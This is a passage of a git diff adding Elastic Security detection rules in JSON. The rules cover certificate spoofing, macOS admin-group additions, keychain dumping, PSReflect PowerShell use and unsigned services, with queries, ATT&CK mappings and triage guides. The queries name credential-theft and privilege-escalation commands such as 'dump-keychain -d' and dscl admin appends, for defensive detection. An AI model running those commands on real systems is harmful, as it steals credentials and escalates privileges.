"https://attack.mitre.org/techniques/T1218/" + } + ] + } + ], + "type": "machine_learning", + "version": 4 + }, + "id": "56004189-4e69-4a39-b4a9-195329d226e9_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json new file mode 100644 index 00000000000..f30ab618f17 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56557cde-d923-4b88-adee-c61b3f3b5dc3_104.json @@ -0,0 +1,79 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.", + "index": [ + "winlogbeat-*", + "logs-windows.*", + "logs-system.security*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows CryptoAPI Spoofing Vulnerability (CVE-2020-0601 - CurveBall)", + "query": "event.provider:\"Microsoft-Windows-Audit-CVE\" and message:\"[CVE-2020-0601]\" and host.os.type:windows\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + } + ], + "risk_score": 21, + "rule_id": "56557cde-d923-4b88-adee-c61b3f3b5dc3", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Use Case: Vulnerability" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1553", + "name": "Subvert Trust Controls", + "reference": "https://attack.mitre.org/techniques/T1553/", + "subtechnique": [ + { + "id": "T1553.002", + "name": "Code Signing", + "reference": "https://attack.mitre.org/techniques/T1553/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 104 + }, + "id": "56557cde-d923-4b88-adee-c61b3f3b5dc3_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json new file mode 100644 index 00000000000..f81ddf82c84 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/565c2b44-7a21-4818-955f-8d4737967d2e_106.json @@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to add an account to the admin group via the command line. This could be an indication of privilege escalation activity.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Admin Group Account Addition", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and\n process.name:(dscl or dseditgroup) and process.args:((\"/Groups/admin\" or admin) and (\"-a\" or \"-append\"))\n", + "references": [ + "https://managingosx.wordpress.com/2010/01/14/add-a-user-to-the-admin-group-via-command-line-3-0/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "565c2b44-7a21-4818-955f-8d4737967d2e", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "565c2b44-7a21-4818-955f-8d4737967d2e_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json new file mode 100644 index 00000000000..a283ab14ca2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/565d6ca5-75ba-4c82-9b13-add25353471c_107.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Adversaries may dump the content of the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features, including Wi-Fi and website passwords, secure notes, certificates, and Kerberos.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Dumping of Keychain Content via Security Command", + "query": "process where host.os.type == \"macos\" and event.type in (\"start\", \"process_started\") and process.args : \"dump-keychain\" and process.args : \"-d\"\n", + "references": [ + "https://ss64.com/osx/security.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "565d6ca5-75ba-4c82-9b13-add25353471c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1555", + "name": "Credentials from Password Stores", + "reference": "https://attack.mitre.org/techniques/T1555/", + "subtechnique": [ + { + "id": "T1555.001", + "name": "Keychain", + "reference": "https://attack.mitre.org/techniques/T1555/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "565d6ca5-75ba-4c82-9b13-add25353471c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json new file mode 100644 index 00000000000..2adcb781257 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110.json @@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of PSReflect to access the win32 API" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell PSReflect Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\" and\n not file.path : ?\\:\\\\\\\\ProgramData\\\\\\\\MaaS360\\\\\\\\Cloud?Extender\\\\\\\\AR\\\\\\\\Scripts\\\\\\\\ASModuleCommon.ps1*\n", + "references": [ + "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 110 + }, + "id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json new file mode 100644 index 00000000000..ccaa207b34c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210.json @@ -0,0 +1,114 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the use of PSReflect in PowerShell scripts. Attackers leverage PSReflect as a library that enables PowerShell to access win32 API functions.", + "false_positives": [ + "Legitimate PowerShell scripts that make use of PSReflect to access the win32 API" + ], + "filters": [ + { + "meta": { + "negate": true + }, + "query": { + "wildcard": { + "file.path": { + "case_insensitive": true, + "value": "?:\\\\ProgramData\\\\MaaS360\\\\Cloud Extender\\\\AR\\\\Scripts\\\\ASModuleCommon.ps1" + } + } + } + } + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell PSReflect Script", + "note": "## Triage and analysis\n\n### Investigating PowerShell PSReflect Script\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nPSReflect is a library that enables PowerShell to access win32 API functions in an uncomplicated way. It also helps to create enums and structs easily\u2014all without touching the disk.\n\nAlthough this is an interesting project for every developer and admin out there, it is mainly used in the red team and malware tooling for its capabilities.\n\nDetecting the core implementation of PSReflect means detecting most of the tooling that uses Windows API through PowerShell, enabling defenders to discover tools being dropped in the environment.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics. The script content that may be split into multiple script blocks (you can use the field `powershell.file.script_block_id` for filtering).\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the script using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.category:process and host.os.type:windows and\n powershell.file.script_block_text:(\n \"New-InMemoryModule\" or\n \"Add-Win32Type\" or\n psenum or\n DefineDynamicAssembly or\n DefineDynamicModule or\n \"Reflection.TypeAttributes\" or\n \"Reflection.Emit.OpCodes\" or\n \"Reflection.Emit.CustomAttributeBuilder\" or\n \"Runtime.InteropServices.DllImportAttribute\"\n ) and\n not user.id : \"S-1-5-18\"\n", + "references": [ + "https://github.com/mattifestation/PSReflect/blob/master/PSReflect.psm1", + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + }, + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 210 + }, + "id": "56f2e9b5-4803-4e44-a0a4-a52dc79d57fe_210", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json new file mode 100644 index 00000000000..da1a631e8a0 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104.json @@ -0,0 +1,129 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule identifies the execution of unsigned executables via service control manager (SCM). Adversaries may abuse SCM to execute malware or escalate privileges.", + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Execution of an Unsigned Service", + "new_terms_fields": [ + "host.id", + "process.executable", + "user.id" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and \nprocess.parent.executable:\"C:\\\\Windows\\\\System32\\\\services.exe\" and \n(process.code_signature.exists:false or process.code_signature.trusted:false) and\nnot process.code_signature.status : (errorCode_endpoint* or \"errorChaining\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "56fdfcf1-ca7c-4fd9-951d-e215ee26e404", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Rule Type: BBR", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1569", + "name": "System Services", + "reference": "https://attack.mitre.org/techniques/T1569/", + "subtechnique": [ + { + "id": "T1569.002", + "name": "Service Execution", + "reference": "https://attack.mitre.org/techniques/T1569/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 104 + }, + "id": "56fdfcf1-ca7c-4fd9-951d-e215ee26e404_104", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json b/packages/security_detection_engine/kibana/security_rule/577ec21e-56fe-4065-91d8-45eb8224fe77_108.json new file mode 100644 index 00000000000..0765db2290f --- /dev/null +++ 